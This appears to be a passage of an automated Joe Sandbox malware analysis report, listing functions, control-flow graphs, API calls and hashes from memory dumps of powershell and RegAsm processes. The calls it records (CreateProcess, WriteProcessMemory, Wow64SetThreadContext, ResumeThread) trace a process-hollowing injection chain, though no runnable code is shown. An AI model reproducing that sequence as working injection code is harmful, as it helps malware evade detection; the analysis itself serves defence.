                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 13db4a261b737de8260408eb1c08b495c349754686d8223a9fa89e4cc8c19ae9
                                                    • Instruction ID: 302cc9b86c3dd6883a0ac6ece3b77c7e240223663cfe87f0f0fa89ccd0caebb2
                                                    • Opcode Fuzzy Hash: 13db4a261b737de8260408eb1c08b495c349754686d8223a9fa89e4cc8c19ae9
                                                    • Instruction Fuzzy Hash: 2081C074D0026DDFDF25CFA5C880BEDBBB1AB49304F1490AAE549B7210DB749A85CF94
                                                    Function 0061176C Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 204 61176c-615ff7 206 615ff9-61600b 204->206 207 61600e-61606e WriteProcessMemory 204->207 206->207 208 616070-616076 207->208 209 616077-6160b5 207->209 208->209
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0061605E
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 9f7b74bcb1ffdc6ffe8bd93d61f1686771009119d08e8d93c7844ef7a2e3b7e1
                                                    • Instruction ID: 209757f52dd73e0894ae7612fbe3210b0b0d239cc02648c61c6bf1b1c978d85d
                                                    • Opcode Fuzzy Hash: 9f7b74bcb1ffdc6ffe8bd93d61f1686771009119d08e8d93c7844ef7a2e3b7e1
                                                    • Instruction Fuzzy Hash: FA416AB5D04258DFCB10CFA9D984ADEFBF1BB49314F24902AE819B7310D375AA45CB64
                                                    Function 00615F89 Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 212 615f89-615ff7 213 615ff9-61600b 212->213 214 61600e-61606e WriteProcessMemory 212->214 213->214 215 616070-616076 214->215 216 616077-6160b5 214->216 215->216
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0061605E
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ae68bc3adcb1c52d449b1d73c56fc147ed727c038188928796f4df9c125e3ae7
                                                    • Instruction ID: d37dcc5a0f0662b20f5c1b8c186270a808d5391133ed938a54f7ed68eb7c78f4
                                                    • Opcode Fuzzy Hash: ae68bc3adcb1c52d449b1d73c56fc147ed727c038188928796f4df9c125e3ae7
                                                    • Instruction Fuzzy Hash: 73416AB9D012599FCB10CFA9D984ADEFBF1BB49314F24902AE818B7310D375AA45CF64
                                                    Function 00611778 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 227 611778-615cbc 229 615cd3-615d1a Wow64SetThreadContext 227->229 230 615cbe-615cd0 227->230 231 615d23-615d5b 229->231 232 615d1c-615d22 229->232 230->229 232->231
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: ef59afd7f017743fe7edab01ad6d5cfdfebf96462e1d2b6c2b70e0a9796c69c1
                                                    • Instruction ID: 42b6591e4af9c24ab6d8530a9ef88308a9e145ae221281640badc8cafebcc926
                                                    • Opcode Fuzzy Hash: ef59afd7f017743fe7edab01ad6d5cfdfebf96462e1d2b6c2b70e0a9796c69c1
                                                    • Instruction Fuzzy Hash: C3317DB5D01258DFCB10CFA9D984ADEFBF1AB49314F24902AE419B7350D374AA45CF94
                                                    Function 00611730 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 219 611730-615cbc 221 615cd3-615d1a Wow64SetThreadContext 219->221 222 615cbe-615cd0 219->222 223 615d23-615d5b 221->223 224 615d1c-615d22 221->224 222->221 224->223
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: b93998431b339f777e80fa53ec988ed475edae3a8a8e053357f8baeae06e2d94
                                                    • Instruction ID: c138eea6f0820c100773414e03c76356aacf078420460df6d5de690496f6f284
                                                    • Opcode Fuzzy Hash: b93998431b339f777e80fa53ec988ed475edae3a8a8e053357f8baeae06e2d94
                                                    • Instruction Fuzzy Hash: CA319BB5D01258DFCB10CFA9E984ADEFBF1AB49314F24802AE419B7310D378AA45CF94
                                                    Function 00615C59 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 235 615c59-615cbc 236 615cd3-615d1a Wow64SetThreadContext 235->236 237 615cbe-615cd0 235->237 238 615d23-615d5b 236->238 239 615d1c-615d22 236->239 237->236 239->238
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00615D0A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: ccbb2a62ee981261b16d899a26c640c5e2d71f796302c74c5af50cc8475597fd
                                                    • Instruction ID: 572b9a88901714782f4f763cc9ce4437780728106c1f75cb8c00bac2e73b8302
                                                    • Opcode Fuzzy Hash: ccbb2a62ee981261b16d899a26c640c5e2d71f796302c74c5af50cc8475597fd
                                                    • Instruction Fuzzy Hash: 143179B5D012589FCB10CFA9D984ADEFBF1AB49314F24802AE415B7350D3789A85CF94
                                                    Function 006160C8 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 242 6160c8-616156 ResumeThread 244 616158-61615e 242->244 245 61615f-61618d 242->245 244->245
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 00616146
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 9ed35c956cbb13b906f3fe62737c3b1f3132ffa7ed3c457c4e4897bb1949772b
                                                    • Instruction ID: bdcf9345cfa17018ec341ecd7801d6737bc7b9fc97c8bb68e0b3bbfd35800a50
                                                    • Opcode Fuzzy Hash: 9ed35c956cbb13b906f3fe62737c3b1f3132ffa7ed3c457c4e4897bb1949772b
                                                    • Instruction Fuzzy Hash: B221CEB8D002199FCB10CFA9D584ADEFBF0EB49314F24901AE818B7310C374A941CFA4
                                                    Function 00611790 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 248 611790-616156 ResumeThread 250 616158-61615e 248->250 251 61615f-61618d 248->251 250->251
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 00616146
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 59643b314a5de2aa3a8d4e6b606bad6a0632b0783dda0e5f7f0c6f93bda6b89d
                                                    • Instruction ID: be9f4974af7b442c0ab387341bfb4780deeb6f9bd5a455032fce9c220d48767a
                                                    • Opcode Fuzzy Hash: 59643b314a5de2aa3a8d4e6b606bad6a0632b0783dda0e5f7f0c6f93bda6b89d
                                                    • Instruction Fuzzy Hash: F921A8B8D002189FCB10CFA9D884ADEFBF4EB49314F24906AE819B7310D374A945CFA4
                                                    Function 007B1730 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 587 7b1730-7b1733 588 7b1739-7b1741 587->588 589 7b1735-7b1737 587->589 590 7b1759-7b175d 588->590 591 7b1743-7b1748 588->591 589->588 594 7b188e-7b1898 590->594 595 7b1763-7b1765 590->595 592 7b1749 591->592 593 7b174d-7b1757 591->593 592->593 600 7b174b 592->600 593->590 598 7b189a-7b18a3 594->598 599 7b18a6-7b18ac 594->599 596 7b1767-7b1773 595->596 597 7b1775 595->597 601 7b1777-7b1779 596->601 597->601 602 7b18ae-7b18b0 599->602 603 7b18b2-7b18be 599->603 600->590 601->594 605 7b177f-7b1783 601->605 606 7b18c0-7b18df 602->606 603->606 607 7b1796 605->607 608 7b1785-7b1794 605->608 610 7b1798-7b179a 607->610 608->610 610->594 612 7b17a0-7b17a2 610->612 613 7b17b2 612->613 614 7b17a4-7b17b0 612->614 616 7b17b4-7b17b6 613->616 614->616 616->594 617 7b17bc-7b17be 616->617 618 7b17d8-7b17e3 617->618 619 7b17c0-7b17c6 617->619 620 7b17f2-7b17fe 618->620 621 7b17e5-7b17e8 618->621 622 7b17ca-7b17d6 619->622 623 7b17c8 619->623 624 7b180c-7b1813 620->624 625 7b1800-7b1802 620->625 621->620 622->618 623->618 627 7b181a-7b181c 624->627 625->624 628 7b181e-7b1824 627->628 629 7b1834-7b188b 627->629 630 7b1828-7b182a 628->630 631 7b1826 628->631 630->629 631->629
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc050fbd0d07b90c7d43a2134af57a3fb0f03ea3308a7324ee067fe600518277
                                                    • Instruction ID: 67afe028fea3f627d4dbc750a15fc4dc29490367410b56d4bd9878e7ae0bd437
                                                    • Opcode Fuzzy Hash: bc050fbd0d07b90c7d43a2134af57a3fb0f03ea3308a7324ee067fe600518277
                                                    • Instruction Fuzzy Hash: 3E411236704201DBDB294A2894207FAB7A2BF91321BF885BAE8558B391DF7CCD41C761
                                                    Function 007B0DD3 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 015f2d477f04663795ddfb9ce77b48c862a84f099f7e4a579e3588906b9eb4cb
                                                    • Instruction ID: 26a7b41d1c07b7f10a193d57859f10ee2e5627af212188faad3f00a6857eb87b
                                                    • Opcode Fuzzy Hash: 015f2d477f04663795ddfb9ce77b48c862a84f099f7e4a579e3588906b9eb4cb
                                                    • Instruction Fuzzy Hash: EC31E436744345CFDB29AA64C4503FBB7A1EF95320B28C4AAD4468B2A1DB79CC41C7D1
                                                    Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444097113.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0386a63a63c1afa5d643c478f26a070b19241d22f6a9efdf91dc90bf9f764a4
                                                    • Instruction ID: 564f8ff27b46414340dd157b95b945bd52e7b470785789e5f09a6a177d003f31
                                                    • Opcode Fuzzy Hash: a0386a63a63c1afa5d643c478f26a070b19241d22f6a9efdf91dc90bf9f764a4
                                                    • Instruction Fuzzy Hash: A6018F71504340EAEB248A25EC84BA6BBD8EF91764F2CC51AEC490B282C3799945CAB1
                                                    Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444097113.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 097e36923b0bf308e3040039a23351d239737ddaed0874754bed6dde02b6d3d1
                                                    • Instruction ID: 0c68380bee10ef2e2b19d88649352b0b029caddc59ca4ad838880b7e1d401693
                                                    • Opcode Fuzzy Hash: 097e36923b0bf308e3040039a23351d239737ddaed0874754bed6dde02b6d3d1
                                                    • Instruction Fuzzy Hash: 4DF06271504244AFEB108E15DCC4BA2FBD8EB91724F18C55AED585B282C3799C44CAB1
                                                    Function 007B1B7F Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f566f432ce2330442043f22a57dcf7bc7a5607a222d3e60651f99b6962d2470
                                                    • Instruction ID: 5e6c894f243eb4184e14e7cded7629f1ddf67db1d25634c3df4d920f8c0b2e97
                                                    • Opcode Fuzzy Hash: 8f566f432ce2330442043f22a57dcf7bc7a5607a222d3e60651f99b6962d2470
                                                    • Instruction Fuzzy Hash: 34E0D871B44344CFDF29A66090313EF7751AFA6251FE081E6D45097655DA388805C362

                                                    Non-executed Functions

                                                    Function 007B00A0 Relevance: 15.4, Strings: 12, Instructions: 403COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (:v$(:v$(:v$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:v$L:v$L:v
                                                    • API String ID: 0-1236260346
                                                    • Opcode ID: eb5416dccba9972af7b22822b1afd41686b5aaa82e4419b8e6d99c30ee1bbd45
                                                    • Instruction ID: b33a43d4020435f508da76870002fa5e15e0e846cae16c68d220ec62125eb54a
                                                    • Opcode Fuzzy Hash: eb5416dccba9972af7b22822b1afd41686b5aaa82e4419b8e6d99c30ee1bbd45
                                                    • Instruction Fuzzy Hash: 33D12231B00248EFDB259F68D844BEF77A2AF81310F58846AE9059B291DB78DD45CBE1

                                                    Execution Graph

                                                    Execution Coverage:1.4%
                                                    Dynamic/Decrypted Code Coverage:3.9%
                                                    Signature Coverage:6.2%
                                                    Total number of Nodes:129
                                                    Total number of Limit Nodes:9
                                                    execution_graph 78340 42f403 78343 42e1e3 78340->78343 78346 42c4e3 78343->78346 78345 42e1f9 78347 42c4fd 78346->78347 78348 42c50e RtlFreeHeap 78347->78348 78348->78345 78356 4245a3 78357 4245bf 78356->78357 78358 4245e7 78357->78358 78359 4245fb 78357->78359 78360 42c193 NtClose 78358->78360 78361 42c193 NtClose 78359->78361 78362 4245f0 78360->78362 78363 424604 78361->78363 78366 42e303 RtlAllocateHeap 78363->78366 78365 42460f 78366->78365 78367 401aa1 78368 401a1f 78367->78368 78369 401acf 78367->78369 78372 42f873 78369->78372 78375 42dda3 78372->78375 78376 42ddc9 78375->78376 78387 407223 78376->78387 78378 42dddf 78386 401bca 78378->78386 78390 41ad43 78378->78390 78380 42ddfe 78381 42de13 78380->78381 78405 42c533 78380->78405 78401 427e73 78381->78401 78384 42de2d 78385 42c533 ExitProcess 78384->78385 78385->78386 78389 407230 78387->78389 78408 4160e3 78387->78408 78389->78378 78391 41ad6f 78390->78391 78424 41ac33 78391->78424 78394 41add0 78394->78380 78395 41ad9c 78396 41ada7 78395->78396 78398 42c193 NtClose 78395->78398 78396->78380 78397 41adb4 78397->78394 78399 42c193 NtClose 78397->78399 78398->78396 78400 41adc6 78399->78400 78400->78380 78402 427ed5 78401->78402 78404 427ee2 78402->78404 78435 418283 78402->78435 78404->78384 78406 42c550 78405->78406 78407 42c561 ExitProcess 78406->78407 78407->78381 78409 416100 78408->78409 78411 416116 78409->78411 78412 42cbd3 78409->78412 78411->78389 78414 42cbed 78412->78414 78413 42cc1c 78413->78411 78414->78413 78419 42b7f3 78414->78419 78417 42e1e3 RtlFreeHeap 78418 42cc92 78417->78418 78418->78411 78420 42b80d 78419->78420 78423 22afae8 LdrInitializeThunk 78420->78423 78421 42b839 78421->78417 78423->78421 78425 41ac4d 78424->78425 78429 41ad29 78424->78429 78430 42b893 78425->78430 78428 42c193 NtClose 78428->78429 78429->78395 78429->78397 78431 42b8b0 78430->78431 78434 22b07ac LdrInitializeThunk 78431->78434 78432 41ad1d 78432->78428 78434->78432 78436 4182a0 78435->78436 78442 4187ab 78436->78442 78443 413943 78436->78443 78438 4183da 78439 42e1e3 RtlFreeHeap 78438->78439 78438->78442 78440 4183f2 78439->78440 78441 42c533 ExitProcess 78440->78441 78440->78442 78441->78442 78442->78404 78447 413960 78443->78447 78445 4139bc 78445->78438 78446 4139c6 78446->78438 78447->78446 78448 41b053 RtlFreeHeap LdrInitializeThunk 78447->78448 78448->78445 78449 42f3a3 78450 42f3b3 78449->78450 78451 42f3b9 78449->78451 78454 42e2c3 78451->78454 78453 42f3df 78457 42c493 78454->78457 78456 42e2db 78456->78453 78458 42c4ad 78457->78458 78459 42c4be RtlAllocateHeap 78458->78459 78459->78456 78460 42b7a3 78461 42b7c0 78460->78461 78464 22afdc0 LdrInitializeThunk 78461->78464 78462 42b7e8 78464->78462 78473 424933 78474 42494c 78473->78474 78475 424994 78474->78475 78478 4249d4 78474->78478 78480 4249d9 78474->78480 78476 42e1e3 RtlFreeHeap 78475->78476 78477 4249a4 78476->78477 78479 42e1e3 RtlFreeHeap 78478->78479 78479->78480 78465 413763 78466 413785 78465->78466 78468 42c403 78465->78468 78469 42c420 78468->78469 78472 22afb68 LdrInitializeThunk 78469->78472 78470 42c448 78470->78466 78472->78470 78481 41af33 78482 41af77 78481->78482 78483 41af98 78482->78483 78484 42c193 NtClose 78482->78484 78484->78483 78485 41e0f3 78486 41e119 78485->78486 78490 41e20a 78486->78490 78491 42f4d3 78486->78491 78488 41e1ab 78489 42b7f3 LdrInitializeThunk 78488->78489 78488->78490 78489->78490 78492 42f443 78491->78492 78493 42e2c3 RtlAllocateHeap 78492->78493 78494 42f4a0 78492->78494 78495 42f47d 78493->78495 78494->78488 78496 42e1e3 RtlFreeHeap 78495->78496 78496->78494 78497 413cb3 78498 413ccd 78497->78498 78499 413d2d 78498->78499 78500 413d1c PostThreadMessageW 78498->78500 78500->78499 78349 4189c8 78352 42c193 78349->78352 78351 4189d2 78353 42c1b0 78352->78353 78354 42c1c1 NtClose 78353->78354 78354->78351 78355 22af9f0 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 0042C193 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 287 42c193-42c1cf call 4046d3 call 42d393 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C1CA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 35d480252f95c7a9b98feea759e5853b32f109feb376f3980a4bd7f8c173be69
                                                    • Instruction ID: 7b473c3043948dd1300d2e1bd3a29d072bf4f9e209d7697cbb8ef70274b72ef8
                                                    • Opcode Fuzzy Hash: 35d480252f95c7a9b98feea759e5853b32f109feb376f3980a4bd7f8c173be69
                                                    • Instruction Fuzzy Hash: D9E0DF316002043BD110EB1AEC01FDB775CCFC5710F004429FA0867246D671790086F9
                                                    Function 022B07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Function 022AFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Function 022AFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Function 022AF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 297 22af9f0-22afa05 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
